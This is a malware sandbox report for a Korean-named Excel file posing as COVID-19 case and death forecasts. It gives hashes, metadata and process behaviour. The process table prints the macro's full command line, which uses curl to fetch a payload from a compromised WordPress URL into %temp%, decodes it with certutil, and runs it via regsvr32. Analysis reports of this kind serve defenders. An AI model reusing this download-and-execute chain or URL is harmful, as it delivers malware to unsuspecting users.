analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

COVID-19 감염자 및 사망자 예측.xls

Full analysis: https://app.any.run/tasks/c46376c2-6f9f-4157-b834-d6d3e7cbde76
Verdict: Malicious activity
Analysis date: July 13, 2020, 02:38:03
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
covid19
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: openpyxl, Last Saved By: USER, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jul 8 18:51:14 2020, Last Saved Time/Date: Thu Jul 9 08:16:08 2020, Security: 0
MD5:

268EFE92A6E16C89E62BF0C32113D0C9

SHA1:

D42D766A18FC56170FF2978A2BF07BD9CAFAC3E8

SHA256:

00E82DD014370C9DB5A95FD0FD3A5438E4A51F4D64A15DDFFAA77F2E806D2A74

SSDEEP:

6144:wxEtjPOtioVjDGUU1qfDlavx+W2QnAbz3t3uWT9qwxfRj1NlSgD8lNSQyURDKVyc:c35v5fjvlZDKoQ949IQgQ9zU+kcC

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 2264)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2264)
    • Registers / Runs the DLL via REGSVR32.EXE

      • cmd.exe (PID: 2196)
  • SUSPICIOUS

    • Starts CertUtil for decode files

      • cmd.exe (PID: 2196)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2196)
  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2264)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (48)
.xls | Microsoft Excel sheet (alternate) (39.2)

EXIF

FlashPix

CompObjUserType: Microsoft Excel 2003 Worksheet
CompObjUserTypeLen: 31
HeadingPairs:
  • Worksheets
  • 15
TitleOfParts:
  • world_case
  • world_death
  • asia_case
  • asia_death
  • europe_case
  • europe_death
  • america_case
  • america_death
  • africa_case
  • africa_death
  • ocean_case
  • ocean_death
  • 자료
  • 감염자 예측
  • 사망자 예측
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CodePage: Unicode (UTF-8)
Security: None
ModifyDate: 2020:07:09 07:16:08
CreateDate: 2020:07:08 17:51:14
Software: Microsoft Excel
LastModifiedBy: USER
Author: openpyxl
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
6
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start excel.exe no specs cmd.exe no specs certutil.exe no specs cmd.exe no specs timeout.exe no specs regsvr32.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2264"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
2196cmd /c curl "http://refeeldominicana.nwideas.com/wp-content/uploads/chimps/category.php" -o "%temp%\1.tmp"&certutil -decode "%temp%\1.tmp" "%temp%\lk.tmp"&cmd /c del "%temp%\1.tmp"&timeout 60&regsvr32 /s "%temp%\lk.tmp"C:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
3
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2644certutil -decode "C:\Users\admin\AppData\Local\Temp\1.tmp" "C:\Users\admin\AppData\Local\Temp\lk.tmp"C:\Windows\system32\certutil.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
2147942402
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3812cmd /c del "C:\Users\admin\AppData\Local\Temp\1.tmp"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2076timeout 60C:\Windows\system32\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3220regsvr32 /s "C:\Users\admin\AppData\Local\Temp\lk.tmp"C:\Windows\system32\regsvr32.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft(C) Register Server
Exit code:
3
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
647
Read events
526
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
0
Unknown types
7

Dropped files

PID
Process
Filename
Type
2264EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRC0B2.tmp.cvr
MD5:
SHA256:
2264EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ACCD76C5.emfemf
MD5:50BEF0FC1D1741D0CA3BBA19B2ACF71C
SHA256:C904300F6CCD82506C5D7C3CBEBA44B38430566C99964D1259460CF30DE8AA8E
2264EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\70D63F69.emfemf
MD5:3E9FFDD275AC38C8AA6C2E9665E75462
SHA256:DFA4168D55AE03F22C0F9D744557CB2FE7BCFF52866FC4B5B26EB682DDA5DA06
2264EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\25AA8B08.emfemf
MD5:F53FBE8CD5C53676C283FCA53D319CA0
SHA256:7BB98D54E83677AC7092C789AD5CF8DC3CB82BE002F2CBFC8B094BE37AA7FE87
2264EXCEL.EXEC:\Users\admin\AppData\Local\Temp\Excel8.0\MSForms.exdtlb
MD5:54150BF0F5B95D2F221A6BD75D109D8D
SHA256:E3FBEC052DAEA62411C6DFEAA645016057A428B33B0C0AACDD293F07DD183F66
2264EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\49660E56.emfemf
MD5:F02D196959169825608B8081C866AE6B
SHA256:376A571E5584F3F2AEC5FCC21A4C5AC9B53B6E97ABA2EA6811A65C338EBC6483
2264EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FE6FC4D4.emfemf
MD5:240B486BB1A716ED73194870173AC5C9
SHA256:A743ACB7F05CCB615B50B70C47325D723E5A9762E0C2D4976F2C32675966D445
2264EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CA4AFE5F.emfemf
MD5:BD3D13AFA2AB30D1777D6A830594554B
SHA256:CB38AAC890CE449DA8692D617424F6D72F1CF709C17B0452AC1A2DA5F5E91FD4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info